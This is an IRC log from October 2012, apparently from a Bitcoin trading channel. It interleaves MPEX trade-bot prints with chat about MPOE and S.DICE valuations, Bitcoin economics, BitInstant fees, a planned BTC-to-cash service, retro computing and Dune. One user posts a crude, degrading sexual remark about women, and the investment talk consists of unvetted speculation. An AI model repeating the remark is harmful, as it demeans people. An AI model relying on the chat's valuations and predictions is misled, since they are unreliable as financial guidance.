[+] Oct 17 14:00:50 [MPEX] [S.MPOE] 5063 @ 0.00041748 = 2.1137 BTC [+] Oct 17 14:02:06 for start, it proves that no matter what money/coin is used, it still ends up in the hands of 1% Oct 17 14:02:17 same shit, different coin :) **** BEGIN LOGGING AT Thu Oct 18 00:45:35 2012 Oct 18 00:52:55 [MPEX] [S.MPOE] 4122 @ 0.00041802 = 1.7231 BTC [+] Oct 18 00:52:57 [MPEX] [S.MPOE] 40100 @ 0.00042015 = 16.848 BTC [+] Oct 18 00:52:58 [MPEX] [S.MPOE] 4788 @ 0.00042087 = 2.0151 BTC [+] Oct 18 00:52:59 [MPEX] [S.MPOE] 7100 @ 0.00042106 = 2.9895 BTC [+] Oct 18 00:53:00 [MPEX] [S.MPOE] 25600 @ 0.00042121 = 10.783 BTC [+] Oct 18 00:53:01 [MPEX] [S.MPOE] 22000 @ 0.00042125 = 9.2675 BTC [+] Oct 18 00:53:02 [MPEX] [S.MPOE] 11290 @ 0.00042136 = 4.7572 BTC [+] Oct 18 00:54:31 [MPEX] [S.MPOE] 100 @ 0.00042136 = 0.0421 BTC [+] Oct 18 01:11:43 [MPEX] [O.BTCUSD.P120T] 650 @ 0.11358979 = 73.8334 BTC [-] Oct 18 01:12:01 [MPEX] [O.BTCUSD.C100T] 650 @ 0.2194982 = 142.6738 BTC [+] Oct 18 01:38:09 [MPEX] [S.MPOE] 11700 @ 0.00041811 = 4.8919 BTC [-] Oct 18 02:02:28 ;;ticker Oct 18 02:02:29 Best bid: 11.82665, Best ask: 11.8277, Bid-ask spread: 0.00105, Last trade: 11.93505, 24 hour volume: 23156, 24 hour low: 11.7, 24 hour high: 11.95998 Oct 18 02:04:30 http://news.blogs.cnn.com/2012/10/17/man-arrested-in-plot-to-blow-up-federal-reserve-bank-in-new-york/?hpt=hp_t1 Oct 18 02:04:34 damnit! Oct 18 02:04:41 [MPEX] [S.MPOE] 6824 @ 0.00041744 = 2.8486 BTC [-] Oct 18 02:04:42 [MPEX] [S.MPOE] 23976 @ 0.00041733 = 10.0059 BTC [-] Oct 18 02:05:30 lol mpoe is going up and down Oct 18 02:18:06 http://i.imgur.com/jO3lR.gif Oct 18 02:18:10 http://i.imgur.com/vzWw4.gif Oct 18 02:28:54 :P Oct 18 02:30:24 [MPEX] [S.MPOE] 20400 @ 0.00041811 = 8.5294 BTC [+] Oct 18 02:30:26 [MPEX] [S.MPOE] 10724 @ 0.00041866 = 4.4897 BTC [+] Oct 18 02:55:49 [MPEX] [S.MPOE] 18752 @ 0.00041866 = 7.8507 BTC [+] Oct 18 03:22:08 [MPEX] [S.MPOE] 12900 @ 0.0004207 = 5.427 BTC [+] Oct 18 03:36:03 eh, it looks like it would now take something like 200 months for getting back your investment in interests on S.MPOE Oct 18 03:49:26 [MPEX] [S.MPOE] 25200 @ 0.00042064 = 10.6001 BTC [-] Oct 18 04:14:34 [MPEX] [S.MPOE] 6201 @ 0.00042045 = 2.6072 BTC [-] Oct 18 04:33:41 I DONT WANNA WERK Oct 18 04:33:48 I JUST WANNA BANG ON MIRCEA'S SLUTS ALL DAY Oct 18 04:37:10 rg: when do you move? Oct 18 04:39:39 [MPEX] [S.MPOE] 42500 @ 0.00042045 = 17.8691 BTC [-] Oct 18 04:45:43 copumpkin: not soon enough Oct 18 04:45:52 my cheap ass employer is 'shopping for immigration lawyers' Oct 18 04:45:59 :/ Oct 18 04:46:03 they were setup with a perfectly fine guy Oct 18 04:46:12 he did the immigration for my friend from Ukraine -> UK Oct 18 04:46:16 still moving to scamtown? Oct 18 04:46:21 who also works at the company Oct 18 04:46:27 but he wants to be paid, obviously Oct 18 04:46:31 and they dont wanna pay him Oct 18 04:47:20 dammit now i've go tto play Oct 18 04:47:27 their cheapskatery is inhibiting my employment Oct 18 04:47:32 dammit wrong window Oct 18 05:06:05 [MPEX] [S.MPOE] 599 @ 0.00042045 = 0.2518 BTC [-] Oct 18 05:06:06 [MPEX] [S.MPOE] 8848 @ 0.0004203 = 3.7188 BTC [-] Oct 18 05:06:07 [MPEX] [S.MPOE] 2753 @ 0.00042004 = 1.1564 BTC [-] Oct 18 05:28:25 rg: tell them to quit being assholes Oct 18 05:28:28 *arseholes Oct 18 05:30:01 i id Oct 18 05:30:02 did Oct 18 05:30:05 i talked to them the other weke Oct 18 05:30:13 a friend who works there was ordered to do a report Oct 18 05:30:16 and i helped him with it Oct 18 05:30:19 meaning i got credit on it Oct 18 05:30:24 so when he presented i Oct 18 05:30:26 it Oct 18 05:30:32 my name was plastered all over the bulk of it Oct 18 05:30:41 so they were like ohh shit... hes already doing work for us Oct 18 05:30:50 i got an email the next day Oct 18 05:32:33 [MPEX] [S.MPOE] 8917 @ 0.00042058 = 3.7503 BTC [+] Oct 18 05:58:25 [MPEX] [S.MPOE] 28783 @ 0.00042058 = 12.1056 BTC [+] Oct 18 05:58:27 [MPEX] [S.MPOE] 14917 @ 0.00042004 = 6.2657 BTC [-] Oct 18 06:24:05 [MPEX] [S.MPOE] 21300 @ 0.00042004 = 8.9469 BTC [-] Oct 18 06:49:33 [MPEX] [S.MPOE] 11700 @ 0.00042064 = 4.9215 BTC [+] **** ENDING LOGGING AT Thu Oct 18 06:56:14 2012 **** BEGIN LOGGING AT Thu Oct 18 06:56:40 2012 Oct 18 07:16:23 [MPEX] [S.MPOE] 15500 @ 0.00042064 = 6.5199 BTC [+] Oct 18 07:16:25 [MPEX] [S.MPOE] 31833 @ 0.0004207 = 13.3921 BTC [+] Oct 18 07:41:28 [MPEX] [S.MPOE] 41017 @ 0.00042008 = 17.2304 BTC [-] Oct 18 07:41:29 [MPEX] [S.MPOE] 3083 @ 0.00042004 = 1.295 BTC [-] Oct 18 08:06:31 [MPEX] [S.MPOE] 3510 @ 0.0004207 = 1.4767 BTC [+] Oct 18 08:33:06 [MPEX] [S.MPOE] 6757 @ 0.0004207 = 2.8427 BTC [+] Oct 18 08:33:07 [MPEX] [S.MPOE] 4493 @ 0.00042136 = 1.8932 BTC [+] Oct 18 08:33:09 [MPEX] [S.MPOE] 23750 @ 0.00042155 = 10.0118 BTC [+] Oct 18 09:00:22 [MPEX] [S.MPOE] 53600 @ 0.00042046 = 22.5367 BTC [-] Oct 18 09:25:47 [MPEX] [S.MPOE] 44500 @ 0.00042071 = 18.7216 BTC [+] Oct 18 09:51:07 [MPEX] [S.MPOE] 5700 @ 0.00042046 = 2.3966 BTC [-] Oct 18 09:51:08 [MPEX] [S.MPOE] 7708 @ 0.00042004 = 3.2377 BTC [-] Oct 18 09:51:10 [MPEX] [S.MPOE] 23992 @ 0.00041869 = 10.0452 BTC [-] Oct 18 10:17:14 [MPEX] [S.MPOE] 12300 @ 0.00042071 = 5.1747 BTC [+] Oct 18 10:17:15 [MPEX] [S.MPOE] 5900 @ 0.00042155 = 2.4871 BTC [+] Oct 18 10:42:17 [MPEX] [S.MPOE] 15800 @ 0.00041869 = 6.6153 BTC [-] Oct 18 11:07:41 [MPEX] [S.MPOE] 10813 @ 0.00041869 = 4.5273 BTC [-] Oct 18 11:07:42 [MPEX] [S.MPOE] 10678 @ 0.00041793 = 4.4627 BTC [-] Oct 18 11:33:39 [MPEX] [S.MPOE] 18640 @ 0.00042155 = 7.8577 BTC [+] Oct 18 11:33:40 [MPEX] [S.MPOE] 8294 @ 0.00042219 = 3.5016 BTC [+] Oct 18 11:33:41 [MPEX] [S.MPOE] 5866 @ 0.00042224 = 2.4769 BTC [+] Oct 18 12:00:25 [MPEX] [O.BTCUSD.P120T] 6 @ 0.10801886 = 0.6481 BTC [-] Oct 18 12:26:49 [MPEX] [S.MPOE] 7804 @ 0.00042224 = 3.2952 BTC [+] Oct 18 12:53:47 [MPEX] [S.MPOE] 31900 @ 0.00042052 = 13.4146 BTC [-] **** ENDING LOGGING AT Thu Oct 18 13:11:41 2012 **** BEGIN LOGGING AT Thu Oct 18 13:12:54 2012 Oct 18 13:19:10 [MPEX] [S.MPOE] 9700 @ 0.00042052 = 4.079 BTC [-] Oct 18 13:33:23 [MPEX] [O.BTCUSD.P100T] 3 @ 0.04567205 = 0.137 BTC [-] Oct 18 13:59:07 [MPEX] [S.MPOE] 6012 @ 0.00041853 = 2.5162 BTC [-] Oct 18 13:59:09 [MPEX] [S.MPOE] 2822 @ 0.00041793 = 1.1794 BTC [-] Oct 18 13:59:10 [MPEX] [S.MPOE] 34900 @ 0.00041769 = 14.5774 BTC [-] Oct 18 13:59:11 [MPEX] [S.MPOE] 5100 @ 0.00041759 = 2.1297 BTC [-] Oct 18 14:25:08 [MPEX] [S.MPOE] 44000 @ 0.00041759 = 18.374 BTC [-] Oct 18 14:25:08 [MPEX] [S.MPOE] 10900 @ 0.00041743 = 4.55 BTC [-] **** ENDING LOGGING AT Thu Oct 18 14:44:04 2012 **** BEGIN LOGGING AT Thu Oct 18 14:44:48 2012 Oct 18 14:52:37 [MPEX] [S.MPOE] 25577 @ 0.00041743 = 10.6766 BTC [-] **** BEGIN LOGGING AT Fri Oct 19 02:39:47 2012 Oct 19 02:41:53 not any more Oct 19 02:43:06 what's up folks! Oct 19 02:43:12 you are back Oct 19 02:43:19 missed you the past few days Oct 19 02:43:46 jurov and i want to make pretty graphs for MPOE Oct 19 02:43:56 can we :) Oct 19 02:47:55 haah sure. Oct 19 02:48:18 i didn't even know i was gone! Oct 19 02:48:51 ive been reading your blog and taking metrics for my business project Oct 19 02:49:01 you have good insight into things Oct 19 02:49:17 o hey ty. Oct 19 02:50:09 lol, did Clipse run off too? Oct 19 02:50:38 [MPEX] [S.MPOE] 3100 @ 0.00045824 = 1.4205 BTC [-] Oct 19 02:50:59 whoa ?! Oct 19 02:51:30 when did 45 happen ? Oct 19 02:51:43 today Oct 19 02:51:52 jurov service has something to do with it Oct 19 02:52:09 i made a call today and its slowly been going up Oct 19 02:52:19 [MPEX] [S.MPOE] 105 @ 0.0004601 = 0.0483 BTC [+] Oct 19 02:52:21 [MPEX] [S.MPOE] 48300 @ 0.00045738 = 22.0915 BTC [-] Oct 19 02:52:22 let's simmer down for a moment. Oct 19 02:52:22 [MPEX] [S.MPOE] 40163 @ 0.0004557 = 18.3023 BTC [-] Oct 19 02:52:23 [MPEX] [S.MPOE] 15400 @ 0.00045383 = 6.989 BTC [-] Oct 19 02:52:23 [MPEX] [S.MPOE] 31700 @ 0.00045326 = 14.3683 BTC [-] Oct 19 02:52:25 [MPEX] [S.MPOE] 32171 @ 0.00044274 = 14.2434 BTC [-] Oct 19 02:52:35 lol Oct 19 02:52:48 its a new high. reason to celebrate non? Oct 19 02:53:14 dude, srsly, it's very nice to wake up, log in, and see you're worth 30k btc more now Oct 19 02:54:29 reserve stock? Oct 19 02:54:52 or is that the market valuation of mpoe? Oct 19 02:55:13 .g trilema mpoe resultate septembrie Oct 19 02:55:14 mircea_popescu: http://trilema.com/2012/mpoe-rezultate-septembrie-2012/ Oct 19 02:55:25 im like 90% shareholder still. Oct 19 02:55:47 wow you have a lot of stock reserved jaha Oct 19 02:55:50 good for you mang Oct 19 02:56:17 it's been making money all around, you should ask smickles about mpoe.etf history. Oct 19 02:56:25 mpoe is worth almost 1m usd now? Oct 19 02:56:30 0.6M Oct 19 02:56:37 originally my stock was offered in a ballot system (anyone could send money, fixed block would be allocated proportionally at the end of an interval) Oct 19 02:56:55 he ran this glbse thing collecting investment and subscribing it in that programme Oct 19 02:57:08 ended up with ~1.2 btc of stock for each .1 invested originally. Oct 19 02:57:16 and no, mpoe is worth like 6mn now. Oct 19 02:57:17 wow Oct 19 02:57:27 congrats dude fo realz Oct 19 02:57:37 a lot haters out there Oct 19 02:57:55 course it doesn't actually have the mkt depth to liquidate for 6mn, and anyway the contract prevents me from selling more than half. Oct 19 02:58:02 behind every successful person lies a pack of haters Oct 19 02:58:04 so it's not really realisable as it is. but still nice. Oct 19 02:58:16 what haters tho ? everyone's been very supportive since day one. Oct 19 02:58:37 like the people who trash you on the forums like children Oct 19 02:58:42 eh the forum Oct 19 02:59:02 half o' those dunno what day it is. Oct 19 02:59:55 qq real quick off topic sorta: why is s.dice illiquid atm? Oct 19 03:00:10 is it because of the last dividend payment? Oct 19 03:00:12 i dunno Oct 19 03:00:14 !ticker s.dice Oct 19 03:00:16 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0001 / 0.00298094 / 0.0034 (1988753 shares, 5,928.36 BTC) Oct 19 03:00:25 kinda weak huh. Oct 19 03:00:29 yea Oct 19 03:00:37 i was gonna try to market make Oct 19 03:00:42 but whats the point... Oct 19 03:00:44 somebody had a nice analysis thread in forum, do you have a link ? Oct 19 03:00:48 maybe the thing lost money on bets ? Oct 19 03:00:52 yea Oct 19 03:00:56 o it did ?! Oct 19 03:01:10 no i meant o saw the link Oct 19 03:01:11 i* Oct 19 03:01:13 a Oct 19 03:01:20 sorru thumb typing on phone Oct 19 03:01:28 typoes everywhere Oct 19 03:01:30 anyway you need significant capital to mm that. it's a 400k-ish float object Oct 19 03:01:37 yea Oct 19 03:02:22 someone posted some numbers stating the roi on the sdice dividends is over a year Oct 19 03:02:30 maybe 2 Oct 19 03:02:45 what did it come to ? something like 5% ish ? Oct 19 03:03:06 lemme see Oct 19 03:03:14 its linkes to the ipo Oct 19 03:03:17 linked* Oct 19 03:04:28 http://i.imgur.com/2Gyqt.png Oct 19 03:04:32 ya seems to have retraced a little Oct 19 03:04:42 foubd it Oct 19 03:04:57 i think many people buy/sell based on the immediate dividends expectation Oct 19 03:05:47 yeah Oct 19 03:05:56 thats what pissed all the DMC shareholders off Oct 19 03:06:09 3200 btc investment in sdice is 27 btc a month in div Oct 19 03:06:10 and since past few days it lost ~2k... i guess dividend doesn't look like much Oct 19 03:06:12 they suddenly discovered DMC wasnt a scam and tried to get nefario to shut it down Oct 19 03:06:23 so they're selling, taking a 15% loss on their capital investment to avoid a 3% unrealised gain Oct 19 03:06:23 this guy out it at 118 month roi Oct 19 03:06:28 put* Oct 19 03:06:38 thestringpuller what's "118 month roi" mean ? Oct 19 03:07:07 118 month for full recoup on the initial investment Oct 19 03:07:09 I assume 118 months to break even Oct 19 03:07:14 that's such an insane metric. Oct 19 03:07:15 what he said Oct 19 03:07:19 i know Oct 19 03:07:22 :/ Oct 19 03:07:24 that metric doesnt make sense Oct 19 03:07:28 because you still have the asset in the end Oct 19 03:07:30 by this token, apple stock is like, "1978 month roi" Oct 19 03:07:31 as if. Oct 19 03:07:44 mircea_popescu: man, apple is such bullshit Oct 19 03:07:49 apple is predictable Oct 19 03:07:49 Diablo-D3 bigger problem : do you think btc income will be as cheap in 12 months as it is today ? Oct 19 03:07:52 its like what, $700 billion now? Oct 19 03:08:00 look at the history. making a new btc used to cost <1 btc a year ago Oct 19 03:08:03 now it's like 10 Oct 19 03:08:08 next year it could even be 30-50 Oct 19 03:08:10 they have lower $300 billion in assets, their brand is not worth the rest Oct 19 03:08:27 mircea_popescu: dude, I sold a large chunk of btc when we crossed $1 thinking it would never cross that Oct 19 03:08:36 Diablo-D3 i know it's bullshit. i'd short it if i could guess when Oct 19 03:08:46 Diablo-D3 i know what you're saying. Oct 19 03:08:50 then a year later it went to $30 Oct 19 03:08:57 shorting is a useful tool Oct 19 03:09:04 many of the early people were "usd parity ?! ?! ??!?!?! ridiculous!!!!!" Oct 19 03:09:28 but we know it will deflate over time Oct 19 03:09:33 if people keep usong it Oct 19 03:09:40 thestringpuller that is what makes btc generators so valuable. Oct 19 03:09:56 miners hoard though Oct 19 03:10:02 in 5 year's time (ie, 60 months) will you be willing to fight with the miners for a new 12 or 6 btc block ? Oct 19 03:10:19 or will you just sit on your div-paying s.dice Oct 19 03:10:30 heh Oct 19 03:10:34 (which meanwhile floated up to reflect the new competition in aquiring btc) Oct 19 03:11:07 thats like asking a guy would he rather go on a gold.expedition or get paid interest on a huge swiss bank account Oct 19 03:11:12 yeah Oct 19 03:11:29 that's the angle i see for sdice. there's this revenue stream in pure btc. there's others, but they are dwindling. Oct 19 03:11:32 well... Oct 19 03:11:37 damn btc is so fucking cool Oct 19 03:11:42 i hear you lol. Oct 19 03:11:42 mircea_popescu: I dunno though, I find it sad the normal stock market makes sense to me but bitcoin doesnt Oct 19 03:11:55 microeconomics in a anarchoCapitalist society Oct 19 03:12:01 Diablo-D3 i wouldn't go as far as to say it makes sense to me. Oct 19 03:12:06 i get moments of clarity. Oct 19 03:12:18 I dunno, I could make money on an average day if I was into that shit Oct 19 03:12:25 also, if I had money to be into that shit :< Oct 19 03:12:25 btc market forces are different no banks Oct 19 03:12:32 thestringpuller: no Oct 19 03:12:34 no volume Oct 19 03:12:41 there is vplume Oct 19 03:12:48 on mt gox at least Oct 19 03:12:52 not.like nyse Oct 19 03:13:03 but its more.money than most see in a lifetime Oct 19 03:13:09 Diablo-D3 if you think in monetary mass terms then volume in btc IS HUGE. Oct 19 03:13:21 that 5k s.dice traded this month ? sure, it's "just" 60k Oct 19 03:13:30 however, it 's .25% OF ALL THE MONETARY MASS Oct 19 03:13:42 which is hughe Oct 19 03:13:47 find me a stock that trades 0.001% of the usd monetary mass irl. Oct 19 03:13:54 LOL Oct 19 03:14:08 maybe apple when they merge witb google and buy the nsa Oct 19 03:14:12 so people have this bad reference of thinking in usd value. think M3% Oct 19 03:14:49 if anyone here plays those rts games where there's like 8 or 100 players and king of the hill ? Oct 19 03:14:57 heh Oct 19 03:14:58 that's kinda what btc is really. we're all vieing for a 21mn btc hill. Oct 19 03:15:21 but what if you cant buy spmething eoth btc Oct 19 03:15:31 you can't buy anything with dst eiher Oct 19 03:15:33 you have to dump.it to.fiay Oct 19 03:15:51 .g dst Oct 19 03:15:52 mircea_popescu: http://en.wikipedia.org/wiki/Daylight_saving_time Oct 19 03:15:54 pff Oct 19 03:16:03 .g drepturi speciale de tragere Oct 19 03:16:03 LOL Oct 19 03:16:04 mircea_popescu: http://ro.wikipedia.org/wiki/Drepturi_speciale_de_tragere Oct 19 03:16:12 XDR Oct 19 03:16:14 there. Oct 19 03:16:39 http://en.wikipedia.org/wiki/Special_drawing_rights Oct 19 03:16:44 if manufacturers start accepting btc.there will be no need to dump Oct 19 03:17:04 thestringpuller nah. i need to fucking get my physical delivery futures already Oct 19 03:17:07 that will be the end of it. Oct 19 03:17:27 heh Oct 19 03:17:59 i feel as tho btc wll be the free iternet currency and will have liquidity to other currencies Oct 19 03:18:12 for the pjysical world Oct 19 03:18:31 the internet-rl distinction is irrelevant from internet's pov. Oct 19 03:18:54 it's like making a victorian society - "modern" society distinction cca 1880. Oct 19 03:19:03 [MPEX] [S.MPOE] 19500 @ 0.00043535 = 8.4893 BTC [-] Oct 19 03:19:10 it makes sense from the past pov, but from the future wtf does this "modern" mean. o, not like you're used to ? heh. Oct 19 03:20:32 i have this awesome picture of the ecommerce clusterfuck Oct 19 03:20:56 [08:13:09] Diablo-D3 if you think in monetary mass terms then volume in btc IS HUGE. Oct 19 03:20:58 I meant glbse Oct 19 03:21:03 so maybe btc can replaxe ecommerce Oct 19 03:21:05 btc volume, for what it is, is pretty big Oct 19 03:21:23 too big, even. Oct 19 03:21:36 its gigantic if you consider the fact we dont have an economy Oct 19 03:21:40 ill feel a lot better about my options once mtgox volume permanently stabilizes under 10k a day Oct 19 03:21:51 (esp if dollar value stays equal or > to today) Oct 19 03:21:56 ecommerce cost about 7% per transaction at the end of the day Oct 19 03:22:00 I assume you mean week average per day Oct 19 03:22:13 Diablo-D3 i mean less than a day per month with over 10k Oct 19 03:22:23 thestringpuller depends, some places its even 10 Oct 19 03:22:23 monday and friday always have retard traffic Oct 19 03:22:27 HURR IMMA DAY TRADERRRRRRR Oct 19 03:22:36 lol Oct 19 03:22:40 LOL Oct 19 03:22:43 bdt Oct 19 03:22:47 what a fkasco Oct 19 03:22:52 we need more smart businesses Oct 19 03:22:54 its so sad mtgox missed the change to be called derpox Oct 19 03:23:09 mircea_popescu: jesus christ Oct 19 03:23:18 mircea_popescu: how do you feel about bitinstant? Oct 19 03:23:21 we'd have an influx of /b/tards and bronies Oct 19 03:23:37 thestringpuller they're the ppl trying to get a card going, neh ? Oct 19 03:23:46 Diablo-D3 o, and now we don't. Oct 19 03:23:56 I'd like to believe we dont :< Oct 19 03:24:10 yea they are Oct 19 03:24:14 Diablo-D3 that's the problem with you :D Oct 19 03:24:21 sometimes I venture into other parts of the forum and dont like what I see Oct 19 03:24:29 thestringpuller hey, unless it somehow blows up in their face its a good thing i think Oct 19 03:24:38 well Oct 19 03:24:43 have you seen the bitinstant fee schedule? Oct 19 03:24:43 hmm Oct 19 03:24:44 its hueg Oct 19 03:24:49 yea its.fucked up Oct 19 03:24:50 i havent looked Oct 19 03:24:51 so yeah, I think its legit and safe Oct 19 03:24:53 i don't much use ccs Oct 19 03:25:00 mircea_popescu: ->paypal, 6% + paypal fees Oct 19 03:25:07 4% for cash deposit Oct 19 03:25:18 so what exactly is their value proposition ? Oct 19 03:25:26 they dont report you to the IRS. Oct 19 03:25:31 or homeland security or whoever Oct 19 03:25:32 ahahahaha Oct 19 03:25:32 instant deposits into exhanges Oct 19 03:25:33 riight. Oct 19 03:25:44 well, they may REPORT you Oct 19 03:25:45 cause nobody asked them so far Oct 19 03:25:48 but thye dont know your name Oct 19 03:25:58 you can have cash -> btc in 10.minutes Oct 19 03:26:13 thestringpuller something lik that may be worth 10% Oct 19 03:26:24 heh Oct 19 03:26:28 yeah Oct 19 03:26:28 ima do the oppositr Oct 19 03:26:33 they're pretty fast at what they do Oct 19 03:26:47 btc -> cash in 10 min Oct 19 03:27:09 thestringpuller im sure that'd have value Oct 19 03:27:30 [MPEX] [S.DICE] 255 @ 0.00339997 = 0.867 BTC [+] Oct 19 03:27:31 i hope so im launching closed beta this saturday Oct 19 03:27:32 [MPEX] [S.DICE] 545 @ 0.00339998 = 1.853 BTC [+] Oct 19 03:27:38 whoop whoop Oct 19 03:27:57 o srsly ? what currencies ? Oct 19 03:28:19 usd for now. then euros Oct 19 03:28:37 then whatever demand asks for Oct 19 03:29:01 gonna use.moneygram/western union as the insts transaction Oct 19 03:29:05 insta* Oct 19 03:29:09 surprised they dont try a chinese version Oct 19 03:29:19 i think dbordello does something like this currently. Oct 19 03:29:29 via moneypak iirc Oct 19 03:29:36 fastcash4bitcoins? Oct 19 03:29:43 oh btcpak Oct 19 03:29:45 I wish github would hurry up Oct 19 03:29:58 Diablo-D3 you know i have a bunch of chinese people on mpex ? Oct 19 03:30:05 mircea_popescu: orly? Oct 19 03:30:09 very intelligent crowd. Oct 19 03:30:19 yeah, chinese money men scare me Oct 19 03:30:27 one dood was whining about having to keep move strings from cold to hot computer Oct 19 03:30:43 then in the next email was o, wait, i figured it. i got a qr generator! now my phone can read it Oct 19 03:30:52 _hah_ Oct 19 03:31:00 thats an interesting way of solving the jew diamond problem Oct 19 03:31:04 and this was like, 3 days after i explained gpg to him. understand, guy didn't even know linux existed on like, the 5th Oct 19 03:31:10 then on the 9th was figuring qr on his own Oct 19 03:31:17 mircea_popescu: wtf! Oct 19 03:31:20 i AM SERIOUS Oct 19 03:31:28 dude, i have to explain things like ONCE, and in passing Oct 19 03:31:33 i think they read my emails > 500 times each. Oct 19 03:31:34 lol Oct 19 03:31:34 this is where I say Ive been using linux for almost 15 years and have not looked back Oct 19 03:31:58 i started on dos Oct 19 03:31:59 the difference is shocking, they've all read the faq etc. Oct 19 03:32:06 I started on dos too Oct 19 03:32:13 dr dos! Oct 19 03:32:18 pff younguns Oct 19 03:32:23 brb mircea_popescu will you be around later? id love to pick your brain some more. your info is invaluable Oct 19 03:32:27 dub twyms. Oct 19 03:32:27 ms dos 2.11 on a 6mhz 8086, 640kb of memory after upgrade Oct 19 03:32:45 thestringpuller possibly, yea. but if not... im on pretty much daily. Oct 19 03:32:50 single floppy drive, no modem, no harddrive (which were like 20mb and the size of the computer, even came in matching case) Oct 19 03:32:55 cool Oct 19 03:32:58 later all Oct 19 03:33:16 I remember my first floppy drive Oct 19 03:33:40 5.25", 360kb Oct 19 03:33:43 no more programming whatever you needed again every time you turn the computer on Oct 19 03:33:55 dub they had old 7inch ones in my computer lab at school, wall decoration Oct 19 03:33:58 early 90s Oct 19 03:34:12 mircea_popescu: hah, ever see those gigantic hard drive platters? Oct 19 03:34:22 yeah lol. Oct 19 03:34:30 actually, i typed on a cardpuncher, aged like 5. Oct 19 03:34:34 recycle center around here had one, kept it as art Oct 19 03:34:45 (i'm not making this shit up, my dad was working in a govt research center) Oct 19 03:34:50 it was like 15 feet tall Oct 19 03:35:00 mircea_popescu must be old Oct 19 03:35:01 a these weren't so big. those cabinet thingees. Oct 19 03:35:11 yeah it was some like 70s shit Oct 19 03:35:12 dub not rally, just romania was behind the times :D Oct 19 03:35:17 I had a computer in '83 Oct 19 03:35:18 .g felix computer Oct 19 03:35:19 mircea_popescu: http://www.felixpc.com/ Oct 19 03:35:29 dub: I was born in 1983 so :< Oct 19 03:35:29 .wik felix computer Oct 19 03:35:31 "Felix is an open source programming language which provides an ML style type system with a syntax that C++ programmers should find easy to learn." - http://en.wikipedia.org/wiki/Felix_(programming_language) Oct 19 03:35:32 that was well into the PC era though Oct 19 03:35:36 jesus forgotten ;/ Oct 19 03:35:57 http://ro.wikipedia.org/wiki/Felix_PC << romanian made pc clone. Oct 19 03:36:07 1985. Oct 19 03:36:42 I used to buy games in a book Oct 19 03:37:01 hah, I still have one of those books Oct 19 03:37:03 you typed out the code, played game once Oct 19 03:37:08 never bother again Oct 19 03:37:30 dub early 90s romanian tv station used to have a computer show Oct 19 03:37:43 they literally broadcast the code. you could load it into a z80 with a cable Oct 19 03:37:56 mircea_popescu: lol cassete drive audio Oct 19 03:37:58 beee-beeeep trdhgkjdfhkjghehekrjghe Oct 19 03:38:06 *cassette Oct 19 03:38:08 yup Oct 19 03:38:08 thats actually quite cool Oct 19 03:38:24 half the time it was like... cracked programs too Oct 19 03:38:27 i got saboteur that way Oct 19 03:38:40 .g saboteur z80 Oct 19 03:38:41 mircea_popescu: http://www.juegaenlaweb.es/spectrum/ Oct 19 03:38:45 woah Oct 19 03:38:51 newsweek is ending publication Oct 19 03:38:52 fuck yeah Oct 19 03:39:10 mircea_popescu had the same thing here, only via FM radio Oct 19 03:39:13 early copy protection wanst exactly hard to beat Oct 19 03:39:24 dub unlike current ? :D Oct 19 03:39:27 kakobrekla haha cool Oct 19 03:39:59 now i wanna hear that header sound once more ;/ Oct 19 03:40:06 wonder if youtube has it Oct 19 03:40:37 man Oct 19 03:40:40 you know what I miss? Oct 19 03:40:48 having to look in the manual for a phrase Oct 19 03:40:52 to continue the game Oct 19 03:40:59 and fuck, I miss _manuals_ Oct 19 03:41:08 some games came with thick fucking tomes Oct 19 03:41:11 Diablo-D3 manuals sucked. Oct 19 03:41:22 loaded with art and other shit Oct 19 03:41:28 then there was teh decoder rings Oct 19 03:41:42 hehe i got the best manual ever with my new router lemme take a pic Oct 19 03:41:56 lots of engrish? Oct 19 03:42:11 Ive gotten electronics with no manual Oct 19 03:42:17 I mean, not like pdf on cd or go online or something Oct 19 03:42:20 there was _nothing_ Oct 19 03:42:32 which is great, it didnt need one either Oct 19 03:42:47 http://www.youtube.com/watch?v=cUsNesaB0Ms hahah Oct 19 03:44:26 http://www.youtube.com/watch?v=3WWKNWgNwLA << ok, this. this WAS THE FUCKING SOUND OF HAPPINESS Oct 19 03:45:12 oh hai, Ive heard this before Oct 19 03:45:35 :D Oct 19 03:45:43 http://www.youtube.com/watch?v=GQOB7wFxSmY this was saboteur Oct 19 03:45:51 a there it is, very thick http://shrani.si/f/3r/x5/4aNMls9T/imag0228.jpg Oct 19 03:45:57 'enterprise' grade stuff. Oct 19 03:46:35 lol. easy! Oct 19 03:47:19 yeah Oct 19 03:47:21 a lot of people actually like microtik too Oct 19 03:47:22 wasnt expecting that Oct 19 03:47:35 https://www.youtube.com/watch?v=LLH3I9QuSCM Oct 19 03:47:39 yeah its great stuff Oct 19 03:47:42 I know of at least one ISP that uses them, and not for CE shit Oct 19 03:47:43 very pleased Oct 19 03:48:29 you know, I'd like to watch a version of dune like this Oct 19 03:51:07 Diablo-D3 why covered tits? Oct 19 03:51:39 oh wow another dune? Oct 19 03:52:16 is it animated? Oct 19 03:52:47 [MPEX] [S.MPOE] 800 @ 0.00043564 = 0.3485 BTC [+] Oct 19 03:55:12 dub: its not real Oct 19 03:55:25 I wish it was Oct 19 03:58:12 I drag out and watch the '84 and '00 movies every couple of years, never gets old Oct 19 04:00:13 actually reminds me, I think there might be some 'prequil' books I havent read yet Oct 19 04:01:20 any title for the movie' Oct 19 04:05:05 uh, dune Oct 19 04:06:50 http://www.imdb.com/title/tt0087182/ and http://www.imdb.com/title/tt0142032/ Oct 19 04:13:45 dune games were awesome Oct 19 04:15:10 dune 1 sucked ass Oct 19 04:15:26 meh i liked it, dune 2 was much better Oct 19 04:15:51 dune 2 kicked ass. invented a new genre for sure Oct 19 04:18:17 [MPEX] [S.MPOE] 30100 @ 0.00043754 = 13.17 BTC [+] Oct 19 04:18:19 [MPEX] [S.MPOE] 15900 @ 0.00043564 = 6.9267 BTC [-] Oct 19 04:20:01 was too bought into RA1 for that shit Oct 19 04:20:38 48 hour ps1 linkup games Oct 19 04:21:50 probably somethign to do with not having a pc Oct 19 04:31:12 the channel is alive again Oct 19 04:31:32 oh yeah, I played dune2 Oct 19 04:40:30 https://venturebeat.files.wordpress.com/2012/10/fake-grimlock-server-on-fire.jpg?w=558&h=9999&crop=0 Oct 19 04:44:04 [MPEX] [S.MPOE] 3700 @ 0.0004349 = 1.6091 BTC [-] Oct 19 04:52:47 mircea_popescu: you still around? Oct 19 04:53:46 ya Oct 19 04:55:33 sweet Oct 19 05:09:57 [MPEX] [S.MPOE] 14844 @ 0.0004349 = 6.4557 BTC [-] Oct 19 05:09:59 